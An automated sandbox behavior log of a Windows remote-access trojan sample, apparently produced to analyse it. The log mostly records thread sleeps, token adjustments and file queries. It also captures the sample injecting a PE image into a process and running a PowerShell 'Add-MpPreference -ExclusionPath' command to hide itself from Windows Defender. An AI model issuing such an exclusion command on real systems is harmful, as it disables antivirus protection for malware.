            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 596993Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 596875Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 596766Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 596641Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 596532Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 596407Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 596297Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 596188Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 596063Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 595938Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 595813Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 595688Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 595578Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 595469Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 595344Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 594985Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5753Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4012Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeWindow / User API: threadDelayed 8704Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeWindow / User API: threadDelayed 1119Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 2076Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5304Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -26747778906878833s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 5880Thread sleep count: 8704 > 30Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 5880Thread sleep count: 1119 > 30Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -599657s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -599532s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -599422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -599313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -599188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -599063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -598938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -598813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -598704s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -598579s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -598454s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -598336s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -598219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -598094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -597985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -597860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -597735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -597610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -597485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -597360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -597235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -597110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -596993s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -596875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -596766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -596641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -596532s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -596407s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -596297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -596188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -596063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -595938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -595813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -595688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -595578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -595469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -595344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -595235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -595110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -594985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -594860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -594735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -594610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -594485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -594360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -594235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164Thread sleep time: -594110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 599422Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 598704Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 598579Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 598454Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 598336Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 598094Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 597860Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 596993Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 596875Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 596766Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 596641Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 596532Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 596407Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 596297Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 596188Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 596063Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 595938Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 595813Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 595688Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 595578Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 595469Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 595344Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 594985Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 594110Jump to behavior
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3265830469.0000000000DA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
